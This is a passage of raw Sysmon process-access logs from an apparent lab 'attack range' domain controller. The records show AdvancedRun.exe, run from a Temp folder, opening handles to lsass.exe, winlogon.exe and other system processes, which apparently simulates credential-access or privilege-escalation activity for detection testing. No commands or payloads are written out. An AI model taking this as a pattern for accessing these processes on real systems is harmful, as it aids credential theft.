20:08:57.650{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067425Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.650{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004067424Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.650{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067423Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.650{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004067422Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.649{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067421Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.649{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067420Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.930{834264DD-DAE7-61EA-1700-000000002702}13003992C:\Windows\System32\svchost.exe{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004063695Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.930{834264DD-DAE7-61EA-1700-000000002702}13003992C:\Windows\System32\svchost.exe{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT 
AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004063694Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.929{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063693Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.929{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program 
Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063692Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.927{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063691Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.927{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063690Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.926{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063689Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.925{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063688Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.925{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063687Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.924{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063686Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.924{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063685Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.923{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\AD